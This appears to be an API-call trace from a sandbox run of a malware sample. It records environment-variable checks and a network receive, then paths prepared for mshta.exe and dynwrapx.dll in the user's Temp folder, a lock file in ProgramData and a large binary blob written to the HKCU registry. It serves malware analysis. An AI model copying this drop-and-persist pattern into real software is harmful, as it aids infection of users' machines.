	[0114.528] RegSetValueExW (in: hKey=0xb98, lpValueName="{ec58180b-dfce-4a67-b18b-e6d83b3e979b}", Reserved=0x0, dwType=0x3, lpData=0x0, cbData=0x0 | out: lpData=0x0) returned 0x0
	[0114.528] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.528] GetLastError () returned 0xcb
	[0114.528] SetLastError (dwErrCode=0x0) 
	[0114.529] SetLastError (dwErrCode=0x0) 
	[0114.529] SetLastError (dwErrCode=0x0) 
	[0114.529] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.529] GetLastError () returned 0xcb
	[0114.529] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.529] GetLastError () returned 0xcb
	[0114.529] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2dc0\x52\x2b0e\x413\x2dc4\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.529] GetLastError () returned 0xcb
	[0114.529] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.529] GetLastError () returned 0xcb
	[0114.529] SetLastError (dwErrCode=0x0) 
	[0114.529] SetLastError (dwErrCode=0x0) 
	[0114.529] SetLastError (dwErrCode=0x0) 
	[0114.531] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.531] GetLastError () returned 0xcb
	[0114.531] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.531] GetLastError () returned 0xcb
	[0114.531] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2dec\x52\x2b0e\x413\x2df0\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.531] GetLastError () returned 0xcb
	[0114.531] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.531] GetLastError () returned 0xcb
	[0114.532] SetLastError (dwErrCode=0x0) 
	[0114.532] SetLastError (dwErrCode=0x0) 
	[0114.532] SetLastError (dwErrCode=0x0) 
	[0114.532] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.532] GetLastError () returned 0xcb
	[0114.532] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.532] GetLastError () returned 0xcb
	[0114.532] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2e18\x52\x2b0e\x413\x2e1c\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.532] GetLastError () returned 0xcb
	[0114.532] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.532] GetLastError () returned 0xcb
	[0114.533] SetLastError (dwErrCode=0x0) 
	[0114.533] SetLastError (dwErrCode=0x0) 
	[0114.533] SetLastError (dwErrCode=0x0) 
	[0114.533] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.533] GetLastError () returned 0xcb
	[0114.533] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.533] GetLastError () returned 0xcb
	[0114.533] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2e44\x52\x2b0e\x413\x2e48\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.533] GetLastError () returned 0xcb
	[0114.533] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.533] GetLastError () returned 0xcb
	[0114.534] SetLastError (dwErrCode=0x0) 
	[0114.534] SetLastError (dwErrCode=0x0) 
	[0114.534] SetLastError (dwErrCode=0x0) 
	[0114.534] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.534] GetLastError () returned 0xcb
	[0114.534] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.534] GetLastError () returned 0xcb
	[0114.534] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2e70\x52\x2b0e\x413\x2e74\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.534] GetLastError () returned 0xcb
	[0114.535] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.535] GetLastError () returned 0xcb
	[0114.535] SetLastError (dwErrCode=0x0) 
	[0114.535] SetLastError (dwErrCode=0x0) 
	[0114.535] SetLastError (dwErrCode=0x0) 
	[0114.535] SetLastError (dwErrCode=0x0) 
	[0114.535] WSARecv (in: s=0xa24, lpBuffers=0x20afbf8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbf0, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbf8*=((len=0x4000, buf=0x2722fd8*)), lpNumberOfBytesRecvd=0x20afbf0*=0x4000, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0) returned 0
	[0114.535] SetLastError (dwErrCode=0x0) 
	[0114.535] SetLastError (dwErrCode=0x0) 
	[0114.535] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.535] GetLastError () returned 0xcb
	[0114.536] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.536] GetLastError () returned 0xcb
	[0114.536] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b00\x52\x2b0e\x413\x2b04\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.536] GetLastError () returned 0xcb
	[0114.536] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.536] GetLastError () returned 0xcb
	[0114.536] SetLastError (dwErrCode=0x0) 
	[0114.536] SetLastError (dwErrCode=0x0) 
	[0114.536] SetLastError (dwErrCode=0x0) 
	[0114.536] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.536] GetLastError () returned 0xcb
	[0114.536] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.536] GetLastError () returned 0xcb
	[0114.537] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b2c\x52\x2b0e\x413\x2b30\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.537] GetLastError () returned 0xcb
	[0114.537] timeGetTime () returned 0x3019d
	[0114.537] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f144, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.537] GetLastError () returned 0xcb
	[0114.538] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x209ef84, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp") returned 0x24
	[0114.538] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x26c6ef0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51
	[0114.538] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x26c6ef0, cbMultiByte=-1, lpWideCharStr=0x25e9538, cchWideChar=51 | out: lpWideCharStr="\\\\?\\C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\mshta.exe") returned 51
	[0114.538] RtlWakeConditionVariable (in: ConditionVariable=0x44a7ba8 | out: ConditionVariable=0x44a7ba8) 
	[0114.539] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x209ef84, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp") returned 0x24
	[0114.539] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x25e95e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54
	[0114.539] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x25e95e0, cbMultiByte=-1, lpWideCharStr=0x26b6de0, cchWideChar=54 | out: lpWideCharStr="\\\\?\\C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\dynwrapx.dll") returned 54
	[0114.539] RtlWakeConditionVariable (in: ConditionVariable=0x44a7ba8 | out: ConditionVariable=0x44a7ba8) 
	[0114.540] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x209f054, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp") returned 0x24
	[0114.540] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x26ccef0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63
	[0114.540] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x26ccef0, cbMultiByte=-1, lpWideCharStr=0x26cdd00, cchWideChar=63 | out: lpWideCharStr="\\\\?\\C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\dynwrapx.sxs.manifest") returned 63
	[0114.540] RtlWakeConditionVariable (in: ConditionVariable=0x44a7ba8 | out: ConditionVariable=0x44a7ba8) 
	[0114.542] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x209f054, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp") returned 0x24
	[0114.543] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20aef60 | out: lpPreviousCount=0x20aef60) returned 1
	[0114.545] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x578800, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60
	[0114.545] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x578800, cbMultiByte=-1, lpWideCharStr=0x578740, cchWideChar=60 | out: lpWideCharStr="\\\\?\\C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\mshta.exe.manifest") returned 60
	[0114.545] RtlWakeConditionVariable (in: ConditionVariable=0x44a7ba8 | out: ConditionVariable=0x44a7ba8) 
	[0114.546] GetEnvironmentVariableW (in: lpName="ALLUSERSPROFILE", lpBuffer=0x209f004, nSize=0x7fff | out: lpBuffer="C:\\ProgramData") returned 0xe
	[0114.546] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x26cd6c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63
	[0114.546] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x26cd6c0, cbMultiByte=-1, lpWideCharStr=0x51df1f0, cchWideChar=63 | out: lpWideCharStr="\\\\?\\C:\\ProgramData\\{d781e3a1-e512-422f-aa6c-27428437cbc4}.lock") returned 63
	[0114.546] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\{d781e3a1-e512-422f-aa6c-27428437cbc4}.lock" (normalized: "c:\\programdata\\{d781e3a1-e512-422f-aa6c-27428437cbc4}.lock"), dwDesiredAccess=0x120116, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x2000080, hTemplateFile=0x0) returned 0xb9c
	[0114.548] GetFileType (hFile=0xb9c) returned 0x1
	[0114.548] SetLastError (dwErrCode=0x0) 
	[0114.548] SetLastError (dwErrCode=0x0) 
	[0114.548] GetLastError () returned 0x0
	[0114.548] SetLastError (dwErrCode=0x0) 
	[0114.548] GetLastError () returned 0x0
	[0114.548] SetLastError (dwErrCode=0x0) 
	[0114.549] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x209f024, nSize=0x7fff | out: lpBuffer="Nd9E1FYi") returned 0x8
	[0114.549] _strcmpi (_Str1="utf8", _Str2="utf8") returned 0
	[0114.549] RegOpenCurrentUser (in: samDesired=0xf003f, phkResult=0x26d72b0 | out: phkResult=0x26d72b0*=0xba0) returned 0x0
	[0114.549] RegCreateKeyExW (in: hKey=0xba0, lpSubKey="SOFTWARE\\Microsoft", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x26d72ac, lpdwDisposition=0x0 | out: phkResult=0x26d72ac*=0xba4, lpdwDisposition=0x0) returned 0x0
	[0114.550] RegSetValueExW (in: hKey=0xba4, lpValueName="{7ade5bfc-66f6-4220-aa24-6032bdb90317}", Reserved=0x0, dwType=0x3, lpData=0x265b0a0*, cbData=0xfeb | out: lpData=0x265b0a0*) returned 0x0
	[0114.550] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.550] GetLastError () returned 0xcb
	[0114.550] SetLastError (dwErrCode=0x0) 
	[0114.550] SetLastError (dwErrCode=0x0) 
	[0114.550] SetLastError (dwErrCode=0x0) 
	[0114.550] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.550] GetLastError () returned 0xcb
	[0114.550] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.550] GetLastError () returned 0xcb
	[0114.551] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b58\x52\x2b0e\x413\x2b5c\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.551] GetLastError () returned 0xcb
	[0114.551] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.551] GetLastError () returned 0xcb
	[0114.551] SetLastError (dwErrCode=0x0) 
	[0114.551] SetLastError (dwErrCode=0x0) 
	[0114.551] SetLastError (dwErrCode=0x0) 
	[0114.553] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.553] GetLastError () returned 0xcb
	[0114.553] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.553] GetLastError () returned 0xcb
	[0114.553] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b84\x52\x2b0e\x413\x2b88\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.553] GetLastError () returned 0xcb
	[0114.553] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.553] GetLastError () returned 0xcb
	[0114.553] SetLastError (dwErrCode=0x0) 
	[0114.553] SetLastError (dwErrCode=0x0) 
	[0114.553] SetLastError (dwErrCode=0x0) 
	[0114.554] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.554] GetLastError () returned 0xcb
	[0114.554] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.554] GetLastError () returned 0xcb
	[0114.554] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2bb0\x52\x2b0e\x413\x2bb4\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.554] GetLastError () returned 0xcb
	[0114.554] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.554] GetLastError () returned 0xcb
	[0114.554] SetLastError (dwErrCode=0x0) 
	[0114.554] SetLastError (dwErrCode=0x0) 
	[0114.554] SetLastError (dwErrCode=0x0) 
	[0114.555] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.555] GetLastError () returned 0xcb
	[0114.555] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.555] GetLastError () returned 0xcb
	[0114.555] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2bdc\x52\x2b0e\x413\x2be0\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.555] GetLastError () returned 0xcb
	[0114.555] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.555] GetLastError () returned 0xcb
	[0114.555] SetLastError (dwErrCode=0x0) 
	[0114.555] SetLastError (dwErrCode=0x0) 
	[0114.555] SetLastError (dwErrCode=0x0) 
	[0114.555] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.556] GetLastError () returned 0xcb
	[0114.556] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.556] GetLastError () returned 0xcb
	[0114.556] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2c08\x52\x2b0e\x413\x2c0c\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.556] GetLastError () returned 0xcb
	[0114.556] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af2c8 | out: lpPreviousCount=0x20af2c8) returned 1
	[0114.556] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.556] GetLastError () returned 0xcb
	[0114.557] SetLastError (dwErrCode=0x0) 
	[0114.557] SetLastError (dwErrCode=0x0) 
	[0114.557] SetLastError (dwErrCode=0x0) 
	[0114.557] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.557] GetLastError () returned 0xcb
	[0114.557] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.557] GetLastError () returned 0xcb
	[0114.557] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2c34\x52\x2b0e\x413\x2c38\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.557] GetLastError () returned 0xcb
	[0114.557] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.558] GetLastError () returned 0xcb
	[0114.558] SetLastError (dwErrCode=0x0) 
	[0114.558] SetLastError (dwErrCode=0x0) 
	[0114.558] SetLastError (dwErrCode=0x0) 
	[0114.558] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.558] GetLastError () returned 0xcb
	[0114.558] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.558] GetLastError () returned 0xcb
	[0114.558] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2c60\x52\x2b0e\x413\x2c64\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.558] GetLastError () returned 0xcb
	[0114.558] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.558] GetLastError () returned 0xcb
	[0114.559] SetLastError (dwErrCode=0x0) 
	[0114.559] SetLastError (dwErrCode=0x0) 
	[0114.559] SetLastError (dwErrCode=0x0) 
	[0114.559] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.559] GetLastError () returned 0xcb
	[0114.559] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.559] GetLastError () returned 0xcb
	[0114.559] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2c8c\x52\x2b0e\x413\x2c90\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.559] GetLastError () returned 0xcb
	[0114.560] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.560] GetLastError () returned 0xcb
	[0114.560] SetLastError (dwErrCode=0x0) 
	[0114.560] SetLastError (dwErrCode=0x0) 
	[0114.560] SetLastError (dwErrCode=0x0) 
	[0114.560] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.560] GetLastError () returned 0xcb
	[0114.560] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.560] GetLastError () returned 0xcb
	[0114.560] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2cb8\x52\x2b0e\x413\x2cbc\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.560] GetLastError () returned 0xcb
	[0114.561] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.561] GetLastError () returned 0xcb
	[0114.561] SetLastError (dwErrCode=0x0) 
	[0114.561] SetLastError (dwErrCode=0x0) 
	[0114.561] SetLastError (dwErrCode=0x0) 
	[0114.561] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.561] GetLastError () returned 0xcb
	[0114.561] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.561] GetLastError () returned 0xcb
	[0114.561] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2ce4\x52\x2b0e\x413\x2ce8\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.561] GetLastError () returned 0xcb
	[0114.561] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.561] GetLastError () returned 0xcb
	[0114.562] SetLastError (dwErrCode=0x0) 
	[0114.562] SetLastError (dwErrCode=0x0) 
	[0114.562] SetLastError (dwErrCode=0x0) 
	[0114.562] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.562] GetLastError () returned 0xcb
	[0114.562] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.562] GetLastError () returned 0xcb
	[0114.562] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2d10\x52\x2b0e\x413\x2d14\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.562] GetLastError () returned 0xcb
	[0114.563] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.563] GetLastError () returned 0xcb
	[0114.563] SetLastError (dwErrCode=0x0) 
	[0114.563] SetLastError (dwErrCode=0x0) 
	[0114.563] SetLastError (dwErrCode=0x0) 
	[0114.563] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.563] GetLastError () returned 0xcb
	[0114.563] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.563] GetLastError () returned 0xcb
	[0114.563] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2d3c\x52\x2b0e\x413\x2d40\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.564] GetLastError () returned 0xcb
	[0114.564] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.564] GetLastError () returned 0xcb
	[0114.564] SetLastError (dwErrCode=0x0) 
	[0114.564] SetLastError (dwErrCode=0x0) 
